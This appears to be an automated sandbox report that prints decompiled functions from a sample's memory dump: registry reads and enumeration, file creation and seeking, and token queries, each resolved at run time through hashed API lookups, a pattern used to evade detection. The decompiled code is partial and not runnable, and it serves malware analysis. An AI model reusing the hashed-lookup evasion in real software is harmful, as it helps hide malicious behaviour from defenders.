GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 73321217

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction ID: 6e8062f2eb180ba3f4aaba5e065ae7e1dad4da9a82739aadbb7d76b41733a32f
Opcode Fuzzy Hash: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction Fuzzy Hash: 95219E70A083067FFB25DA298D00FAB7BAD9FD5201F148928B545C6190EF34D80AC761

Uniqueness

Uniqueness Score: -1.00%

Function 73325720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E73325720(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E73322F8C(0xd0443458, 0x91134e46) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E7331F8C4(_a8, _t15);
							if(E73322F8C(0xd0443458, 0x91134e46) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E7331F558(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x73325724
0x73325725
0x73325727
0x7332572c
0x73325733
0x73325737
0x73325737
0x73325737
0x7332573b
0x73325781
0x73325781
0x7332573d
0x7332573d
0x73325743
0x7332574c
0x7332574f
0x73325766
0x73325777
0x73325777
0x73325779
0x7332577f
0x7332578a
0x733257a2
0x733257c2
0x733257c2
0x733257c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73325743
0x733257cc

APIs

RegQueryValueExA.KERNELBASE(?,7332D1F8,00000000,?,00000000,00000000,?,?,?,7332D1F8,?,733257F3,?,00000000,00000000), ref: 73325777
RegQueryValueExA.KERNELBASE(?,7332D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,7332D1F8,?,733257F3,?,00000000), ref: 733257C2

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction ID: 5a7cdcc411dc5a0d4b212d4a916131acb5b6653bcb2331edee4e14d48f70a028
Opcode Fuzzy Hash: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction Fuzzy Hash: 1B11E1B0609709FFF625CE29DC80FABFFECDF81656F00451EB48587180DA30E9019661

Uniqueness

Uniqueness Score: -1.00%

Function 73325AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E73325AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t29;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t56;
				WCHAR** _t58;
				char* _t64;
				void* _t65;
				long _t66;

				_push(0);
				_push(_t62);
				_t66 = _t65 - 0x10;
				_t58 = __ecx;
				_t37 = _a8;
				if(E7331D288(__ecx, 0x2f) != 0) {
					_t62 = _t66;
					E7331D78C(__ecx, _t66);
					E7331D0B4(_t58,  *_t66);
					E7331D098(_t66);
				}
				if(_t37 == 0) {
					_t70 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E7332621C(_t70);
				if(_a4 <= 5) {
					goto __eax;
				}
				_t62 = 0;
				if(_t37 != 2) {
					_t16 = 3;
					__eflags = _t37 - 1;
					_t38 = 0;
					_t39 =  ==  ? _t16 : _t38;
				} else {
					_t39 = 1;
				}
				if(E73322F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
					_push(_t29);
				}
				_t40 =  &(_t58[3]);
				E7331C328(_t40);
				if(E7331C33C(_t40) != 0) {
					_t58[2] = E7332352C(0);
					_t21 = 0;
					goto L19;
				} else {
					if(_a4 == 2) {
						_t56 = E73322F8C(0x4bcc7cba, 0xceed09cc);
						__eflags = _t56;
						if(_t56 != 0) {
							 *_t56( *_t40, 0, 0, 2);
						}
					}
					_t64 =  &_v24;
					E733235D4(_t64, 0xff, 8);
					_t66 = _t66 + 0xc;
					_t24 = E73322F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t24 == 0) {
						_t21 = 1;
						__eflags = 1;
						L19:
						return _t21;
					} else {
						_push(_t64);
						_push(_t64);
						_push(0);
						_push( *_t40);
						asm("int3");
						return _t24;
					}
				}
			}

0x73325aa8
0x73325aab
0x73325aac
0x73325aaf
0x73325ab1
0x73325abe
0x73325ac2
0x73325ac6
0x73325ad0
0x73325ad7
0x73325ad7
0x73325ade
0x73325ae0
0x73325ae5
0x73325aee
0x73325af6
0x73325af6
0x73325ae7
0x73325ae9
0x73325ae9
0x73325ae5
0x73325afb
0x73325b07
0x73325b1d
0x73325b1d
0x73325c38
0x73325b75
0x73325b7e
0x73325b7f
0x73325b84
0x73325b85
0x73325b77
0x73325b79
0x73325b79
0x73325b9b
0x73325baf
0x73325b9d
0x73325baa
0x73325bac
0x73325bac
0x73325bb1
0x73325bb6
0x73325bc4
0x73325c2f
0x73325c32
0x00000000
0x73325bc6
0x73325bcb
0x73325c18
0x73325c1a
0x73325c1c
0x73325c26
0x73325c26
0x73325c1c
0x73325bcd
0x73325bd9
0x73325bde
0x73325beb
0x73325bf2
0x73325bfe
0x73325bfe
0x73325bff
0x73325c06
0x73325bf4
0x73325bf4
0x73325bf5
0x73325bf6
0x73325bf8
0x73325bfa
0x73325bfb
0x73325bfb
0x73325bf2

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff660b5ae5d1067a6fa55df3852a510a9afa7854b73318c7289815492d96907e
Instruction ID: 6582a13b339c625e91c29fce15b3f3cf46973c619b2b342c63c19695e3381ecb
Opcode Fuzzy Hash: ff660b5ae5d1067a6fa55df3852a510a9afa7854b73318c7289815492d96907e
Instruction Fuzzy Hash: 443129B1744306BFF77526704C85F3BBEAEEB81106F04082EF946D6081EA618A158221

Uniqueness

Uniqueness Score: -1.00%

Function 73325B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E73325B51(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E73322F8C(0x4bcc7cba, 0x80c50a91) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E7331C328(_t24);
					if(E7331C33C(_t24) != 0) {
						_t33[2] = E7332352C(0x80000000);
						_t12 = 0;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E73322F8C(0x4bcc7cba, 0xceed09cc);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E733235D4(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						_t15 = E73322F8C(0x4bcc7cba, 0xaaa9bb);
						if(_t15 == 0) {
							_t12 = 1;
							goto L14;
						} else {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							return _t15;
						}
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
					L14:
					return _t12;
				}
			}

0x73325b51
0x73325b53
0x73325b6a
0x73325b75
0x73325b7e
0x73325b84
0x73325b85
0x73325b77
0x73325b79
0x73325b79
0x73325b9b
0x73325baf
0x73325b9d
0x73325baa
0x73325bac
0x73325bac
0x73325bb1
0x73325bb6
0x73325bc4
0x73325c2f
0x73325c32
0x00000000
0x73325bc6
0x73325bcb
0x73325c18
0x73325c1c
0x73325c26
0x73325c26
0x73325c1c
0x73325bcd
0x73325bd9
0x73325bde
0x73325beb
0x73325bf2
0x73325bfe
0x00000000
0x73325bf4
0x73325bf4
0x73325bf5
0x73325bf6
0x73325bf8
0x73325bfa
0x73325bfb
0x73325bfb
0x73325bf2
0x73325b55
0x73325b55
0x73325b5c
0x73325bff
0x73325c06
0x73325c06

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73325BAA

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction ID: 507cdc2e706ad86c31c2edc1224f3d97caae773376e9df3480cfd70b7e6c542a
Opcode Fuzzy Hash: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction Fuzzy Hash: 420145B2780307BBFB3116109C81F3BFF5EEB82152F14486AF842A60C5DB2286288261

Uniqueness

Uniqueness Score: -1.00%

Function 73325B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E73325B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E73322F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7331C328(_t24);
				if(E7331C33C(_t24) != 0) {
					_t34[2] = E7332352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E73322F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E733235D4(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					_t15 = E73322F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x73325b29
0x73325b2d
0x73325b30
0x73325b33
0x73325b75
0x73325b7e
0x73325b84
0x73325b85
0x73325b77
0x73325b79
0x73325b79
0x73325b9b
0x73325baf
0x73325b9d
0x73325baa
0x73325bac
0x73325bac
0x73325bb1
0x73325bb6
0x73325bc4
0x73325c2f
0x73325c32
0x00000000
0x73325bc6
0x73325bcb
0x73325c18
0x73325c1c
0x73325c26
0x73325c26
0x73325c1c
0x73325bcd
0x73325bd9
0x73325bde
0x73325beb
0x73325bf2
0x73325bfe
0x73325bff
0x73325c06
0x73325bf4
0x73325bf4
0x73325bf5
0x73325bf6
0x73325bf8
0x73325bfa
0x73325bfb
0x73325bfb
0x73325bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73325BAA

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction ID: 72131f6df818a99995eb010bdcd1f8303dab560c5ae59bdb22ca3177051eb752
Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction Fuzzy Hash: BF012BB1780307BFFB3516105C81F3BFE5DDFC2256F04486AB946A60C5EF6189198131

Uniqueness

Uniqueness Score: -1.00%

Function 73325B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E73325B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E73322F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7331C328(_t24);
				if(E7331C33C(_t24) != 0) {
					_t34[2] = E7332352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E73322F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E733235D4(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					_t15 = E73322F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x73325b3d
0x73325b44
0x73325b47
0x73325b75
0x73325b7e
0x73325b84
0x73325b85
0x73325b77
0x73325b79
0x73325b79
0x73325b9b
0x73325baf
0x73325b9d
0x73325baa
0x73325bac
0x73325bac
0x73325bb1
0x73325bb6
0x73325bc4
0x73325c2f
0x73325c32
0x00000000
0x73325bc6
0x73325bcb
0x73325c18
0x73325c1c
0x73325c26
0x73325c26
0x73325c1c
0x73325bcd
0x73325bd9
0x73325bde
0x73325beb
0x73325bf2
0x73325bfe
0x73325bff
0x73325c06
0x73325bf4
0x73325bf4
0x73325bf5
0x73325bf6
0x73325bf8
0x73325bfa
0x73325bfb
0x73325bfb
0x73325bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73325BAA

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction ID: 3e173ef9a8332e9928500490821fac2b607a75d53065ebaf27924166f5a4a36b
Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction Fuzzy Hash: C0014EB17403077FFB3516114C81F3FFE5EDB82153F04486AB946A10C5EF6185188131

Uniqueness

Uniqueness Score: -1.00%

Function 73325B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E73325B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E73322F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7331C328(_t23);
				if(E7331C33C(_t23) != 0) {
					_t31[2] = E7332352C(0x100);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E73322F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E733235D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E73322F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x73325b1f
0x73325b26
0x73325b75
0x73325b7e
0x73325b84
0x73325b85
0x73325b77
0x73325b79
0x73325b79
0x73325b9b
0x73325baf
0x73325b9d
0x73325baa
0x73325bac
0x73325bac
0x73325bb1
0x73325bb6
0x73325bc4
0x73325c2f
0x73325c32
0x00000000
0x73325bc6
0x73325bcb
0x73325c18
0x73325c1c
0x73325c26
0x73325c26
0x73325c1c
0x73325bcd
0x73325bd9
0x73325bde
0x73325beb
0x73325bf2
0x73325bfe
0x73325bff
0x73325c06
0x73325bf4
0x73325bf4
0x73325bf5
0x73325bf6
0x73325bf8
0x73325bfa
0x73325bfb
0x73325bfb
0x73325bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73325BAA

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction ID: 4864194542fb94e432c8890bf86830291e42df5cdc1b4976f9cda482ef8d0190
Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction Fuzzy Hash: C3012DB1780307BBFB3616108C81F3FFE5DDF82252F14086AB986610C5DF6196188131

Uniqueness

Uniqueness Score: -1.00%

Function 73325B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E73325B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E73322F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7331C328(_t23);
				if(E7331C33C(_t23) != 0) {
					_t31[2] = E7332352C(0);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E73322F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E733235D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E73322F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x73325b6d
0x73325b71
0x73325b75
0x73325b7e
0x73325b84
0x73325b85
0x73325b77
0x73325b79
0x73325b79
0x73325b9b
0x73325baf
0x73325b9d
0x73325baa
0x73325bac
0x73325bac
0x73325bb1
0x73325bb6
0x73325bc4
0x73325c2f
0x73325c32
0x00000000
0x73325bc6
0x73325bcb
0x73325c18
0x73325c1c
0x73325c26
0x73325c26
0x73325c1c
0x73325bcd
0x73325bd9
0x73325bde
0x73325beb
0x73325bf2
0x73325bfe
0x73325bff
0x73325c06
0x73325bf4
0x73325bf4
0x73325bf5
0x73325bf6
0x73325bf8
0x73325bfa
0x73325bfb
0x73325bfb
0x73325bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73325BAA

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction ID: cbae257546885b2074eb4cc533d15bffe411d471da0dc3193be4fe44d96e13e3
Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction Fuzzy Hash: E7F028B178030BBBFB3516118C81F3FFE6EEF82152F04086AB946A10C1EF629628C131

Uniqueness

Uniqueness Score: -1.00%

Function 73325D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E73325D7C(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E7331C33C(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E73322F8C(0x4bcc7cba, 0xceed09cc) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x73325d80
0x73325d81
0x73325d83
0x73325d89
0x73325d8b
0x73325d8f
0x73325d8f
0x73325d93
0x73325d9f
0x73325dd3
0x73325dd3
0x00000000
0x73325da1
0x73325da6
0x73325da7
0x73325dbb
0x73325dcc
0x73325dbd
0x73325dc8
0x73325dc8
0x73325dd1
0x73325dd9
0x73325ddb
0x73325dde
0x73325de3
0x73325de3
0x73325de7
0x73325dec
0x00000000
0x00000000
0x00000000
0x73325dd1

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,73325CB4,?,?), ref: 73325DC8

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction ID: 23a775c082fe265bb008a307f4117bcf5c75a4948346504c0c5fabecc7edec88
Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction Fuzzy Hash: 63F04971A157516AF3711A389C44B8BFBE9DFD1311F240B2FF581A6080E72085408390

Uniqueness

Uniqueness Score: -1.00%

Function 733255B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E733255B8(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E73322F8C(0xd0443458, 0x286b2253) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E7331E6E8(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x733255c2
0x733255c4
0x733255cb
0x733255cd
0x733255d1
0x733255d3
0x733255d6
0x733255d9
0x733255d9
0x733255f3
0x00000000
0x00000000
0x73325604
0x73325608
0x00000000
0x00000000
0x73325616
0x73325619
0x7332561e
0x73325623
0x73325623

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 73325604

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

